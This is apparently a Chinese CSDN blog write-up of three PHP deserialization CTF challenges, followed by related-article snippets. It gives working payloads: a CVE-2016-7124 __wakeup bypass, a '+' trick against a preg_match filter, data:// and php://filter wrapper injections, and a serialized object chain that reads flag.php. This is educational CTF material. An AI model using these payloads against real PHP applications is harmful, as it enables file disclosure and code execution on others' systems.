反序列化题目

最新推荐文章于 2024-06-25 23:27:39 发布
最新推荐文章于 2024-06-25 23:27:39 发布
阅读量112 收藏
点赞数
文章标签: android android studio ide
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45090021/article/details/132670681
版权
文章讲述了如何利用PHP的序列化漏洞(如CVE-2016-7124)绕过__wakeup函数,通过修改序列化中的属性数量和内容,以及使用伪协议进行文件读取和数据传输。示例包括flag.php文件的获取和恶意代码执行。
摘要由CSDN通过智能技术生成

第一题

本题需要绕过一个__wakeup()函数

和一个正则匹配preg_match('/[oc]:\d+:/i', $var)

__wakeup():在反序列化执行之前,会先执行__wakeup这个魔术方法,所以需要绕过。

绕过__wakeup()是利用CVE-2016-7124漏洞,即反序列化时,如果表示对象属性个数的值大于真实的属性个数时就会跳过__wakeup( )的执行。

正则匹配preg_match('/[oc]:\d+:/i', $var)如果出现的字符出现在存储的字典中则匹配成功

然后直接在属性前面的加上一个+加号绕过即可

绕过__wakeup:序列化中的属性只有1个然后直接改为2个即可触发条件。

代码中提示f15g_1s_here.php中有东西进行修改读取

$flag=new Demo("f15g_1s_here.php");
#把private $file = 'index.php';把index.php修改为:f15g_1s_here.php
$flag=serialize($flag);
#序列化输出Demo界面
$flag=str_replace('O:4','O:+4',$flag);
#修改里面的属性0:4修改为:0:+4匹配正则
$flag=str_replace(':1:',':2:',$flag);
#修改里面的属性1修改为2绕过__wakup函数
echo base64_encode($flag);
#输出结果为base64编码
运行结果:TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ==

直接传参即可

第二题 

直接f12看到源码

第一个条件用/?txt传参里面的内容是:welcome to the bugkuctf

直接使用伪协议伪造:?txt=data://text/plain,welcome to the bugkuctf

第二个条件用file读取文件直接进行使用伪协议读取

源码中有提示地址hint.php

直接用伪协议读取&file=php://filter/read=convert.base64-encode/resource=hint.php

第三个条件是输入密码还未获取到先留空

拿base64去解码

解出

<?php  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  //这里$this->file 可以设置为flag.php
            echo file_get_contents($this->file); //显示flag.php内容
   echo "<br>";
  return ("good");
        }  
    }  
}  
?>  

直接进行序列化

<?PHP
class Flag{//flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){  //这里$this->file 可以设置为flag.php
            echo file_get_contents($this->file); //显示flag.php内容
            echo "<br>";
            return ("good");
        }
    }
}
$flag = new Flag();
#序列化界面
$flag->file="flag.php";
#直接把路径修改为flag.php
echo serialize($flag);
结果:O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

最后的payload为:?txt=data://text/plain,welcome to the bugkuctf&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

直接f12查看即可

第三题

直接构造序列化

class lemon {
    protected $ClassObj;
    function __construct() {
        $this->ClassObj = new evil();
        #此界面执行normal界面的类,可以利用此界面执行evil
    }
    function __destruct() {

    }
}
class evil {
    private $data="print_r(file_get_contents('flag.php'));";
 #直接定义一个执行命令然后通过上面的lemon执行
}
echo urlencode(serialize(new lemon()));
结果:O%3A5%3A%22lemon%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3Bs%3A39%3A%22print_r%28file_get_contents%28%27flag.php%27%29%29%3B%22%3B%7D%7D

直接传参f12查看即可

第四题

꯭百꯭事꯭可꯭乐꯭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【网络安全 | CTF】记一次PHP序列化反序列化解题详析
等风来
08-24 3888
代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用故需要运行call方法而call方法是在对象上下文中调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法中并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destru
PHP反序列化题目
Galaxy_fan的博客
10-01 896
百度杯十月场_Hash hash用Md5解密是kkkkkk01123 把123换成234,MD5加密 获得变量var,base64解密,正则匹配,如果匹配程序结束,否则反序列化变量var 为了得到f15g_is_here.php内容要绕过正则匹配和_wakeup方法。_wakeup有一个bug就是当序列化字符串中表示对象属性个数的值大于真是的属性个数是就会跳过_wakeup,然后绕过正则可以...
PHP反序列化题目记录
BaiScorpio的博客
06-20 874
最近跑去看了下PHP反序列化,发现比起java容易理解多了,主要是一些魔法函数相关反序列化、字符逃逸的反序列化、session反序列化、POP链反序列化和PHAR反序列化,以下将记录学习过程中的一些例题学习的过程。...
CTF_Web:反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 6565
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
CTF中的反序列化题目
最新发布
weixin_50372036的博客
06-25 729
其次是wakeup,wakeup只需要把序列化字串的对象属性个数1改为别的数字就行了,但是注意这里file 的类型是private,所以打印出来的串是有不可见字符%00的,不要复制出来自己base,不然结果就不一样了。方法有一个CVE漏洞,CVE-2016-7124,在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行,即当前函数中只有一个参数$flag,若传入的序列化字符串中的参数个数为2即可绕过。传入s中,就得到了执行phpinfo后的界面,完成了执行流程的改变。
[EIS2019]EzPOP--反序列化题目
Dream'
06-19 1132
题目地址:https://buuoj.cn/challenges#[EIS%202019]EzPOP 发现代码中可利用点只有file_put_contents($filename, $data) ,所以我们从它开始倒推我们需要分别找到$data的链和$filename的链使options['data_compress']=false,不让$data压缩data来自value,$data = $this->serialize($value);,使options['serialize']=trim,这样se
一道反序列化的CTF题分享
seek_2022的博客
07-23 1162
一道有趣的CTF题目
PHP反序列化之练习题
shy的博客
11-29 1541
pikachu平台反序列化漏洞 第一题:反序列化漏洞输出XSS 地址:https://www.bihuoedu.com/vul/unserilization/unser.php 查看unser.php文件的源码: <?php class S{ var $test = "pikachu"; function __construct(){ echo $this->test; } } //O:1:"S":1:{s:4:"test";s:29:"&.
Java序列化反序列化原理及漏洞解决方案
08-18
Java序列化反序列化原理及漏洞解决方案 Java序列化反序列化原理及漏洞解决方案是Java编程语言中的一项重要机制,该机制允许将Java对象转换为字节序列,以便在网络上传输或存储在文件中。同时,Java也提供了反序列化...
二叉树的序列化和反序列化——C++
净无邪博客
12-15 2573
总体解题思想为先用层次遍历存储包括空节点的每个节点,存储是每个节点都存储左右子节点,如果节点为空,则存储"#,",否则存储节点的值val,同时用逗号','分割每个节点内容,存储完后进行序列化string。反序列化则先按逗号','分割每个字符串为数组字符串vector<string> valStrArr,该valStrArr存储每个节点的值,包括空节点;然后遍历valStrArr,反向构建原始二叉树。反向构建二叉树时由于存储是按层次遍历存入的,所以反向遍历时也需要按照层次遍历依次将非空节点压栈和弹出栈。由于层
两道反序列化例题
limenzzz的博客
05-03 1266
攻防世界: 1.Web_php_unserialize 先代码审计,发现定义了demo类,而在其中有一句 这个函数说明在销毁demo时会高亮回显file。而且前面提示flag在fl4g.php中,于是需要构造反序列化的demo类,且要绕过wake_up函数,根据上篇可知,只要输入的数据数少于规定的就可以绕过。于是需要构造 O:4:"demo":1:{s:10:"Demofile";s:8:"fl4g.php";} //原构造,未构建任何绕过 O:4:"demo":2:{s:10:"De
preg-match绕过
05-19
在 PHP 中,preg_match 函数用于执行正则表达式匹配。为了避免绕过 preg_match 函数的功能限制,通常可以采取以下措施: 过滤用户输入:在将用户输入作为正则表达式模式使用之前,应该对其进行过滤和验证,确保用户输入符合预期,避免恶意输入绕过验证。 限制可接受的输入:在构建正则表达式时,限制可接受的字符范围以及数量,以减少恶意用户绕过的可能性。 谨慎使用/e 修饰符:/e 修饰符允许在匹配时执行 PHP 代码,因此应该谨慎使用以避免安全漏洞。 避免使用用户输入拼接正则表达式:尽量不要将用户输入直接拼接到正则表达式中,以免造成安全风险。 使用辅助函数进行输入验证:编写额外的辅助函数或过滤器来对用户输入进行验证,以防止恶意输入绕过 preg_match 函数。
反序列化】基础题_lemon
serendipity1130的博客
08-29 313
1.代码审计: evil类中有show_source函数,所以想要得到flag需要实例化一个lemon类让他去调用evil类中的action()函数。 2.为什么要实例化:因为只有实例化之后,才能将这个对象放到内存中,然后才能在规定的范围内来调用。这不包括静态对象,静态对象是可以直接调用的。 3.写poc链,首先申明lemon和evil两个类,然后将evil类赋值给classobj变量,让他执行evil类中的show_resource函数。Private和protected对象要进行url编码
网鼎杯 AreUSerialz反序列化题目
god_Zeo的安全博客
05-11 997
看了网鼎杯 AreUSerialz反序列化题目wp 对php的反序列化又有了学到了新的知识点,之前都没注意到 标题题目是这样的: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op =
PHP反序列化刷题合集
2301_76690905的博客
11-20 380
第一步:确定切入点在于($this->func)($this->var);,给func传system,给var传ls /,如果执行的话就是system(‘ls /’)查根目录,那我们怎么执行呢?需要我们触发evil方法第二步:我们注意到pwn类中的$this->obj->evil();可以触发evil()方法,那我们就可以把实例化的web类传给pen类的obj属性,想要真正触发evil()还需要触发__invoke()魔术方法。__invoke会在一个对象被当做函数调用时触发。
PHP反序列化练习册
qwsn
11-19 2637
1、XCTF平台:https://adworld.xctf.org.cn/task 高阶:1.unserialize3 高阶:2.Web_php_unserialize 2、BUUCTF平台:https://buuoj.cn/challenges Web类:4.[安洵杯 2019]easy_serialize_php Web类:5.[ZJCTF 2019]NiZhuanSiWei Basic类:6.BUU CODE REVIEW 1 Web类:7.[网鼎杯 2020 青龙组]AreUSerialz Web类
PHP反序列化漏洞(最全面最详细有例题)
m0_73728268的博客
04-14 2808
详细讲解PHP反序列化漏洞的基本原理及利用,由简入精,深入浅出;包含Docker环境搭建,例题解析;类与对象简介;序列化与反序列化基础知识;魔术方法原理及利用;POP链构造及解析;字符串逃逸;session反序列化,phar反序列化等;
PHP序列化与反序列化记录
LYJ20010728的博客
12-04 565
(1): preg_match(’/[oc]:\d+:/i’, $value, $matches); 在include/utils.php类有sugar_unserialize方法 function sugar_unserialize($value) { preg_match('/[oc]:\d+:/i', $value, $matches); if (count($matches)) { return false; } return unserializ
网安学习-反序列化漏洞
weixin_44770698的博客
06-06 875
初始序列化漏洞
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值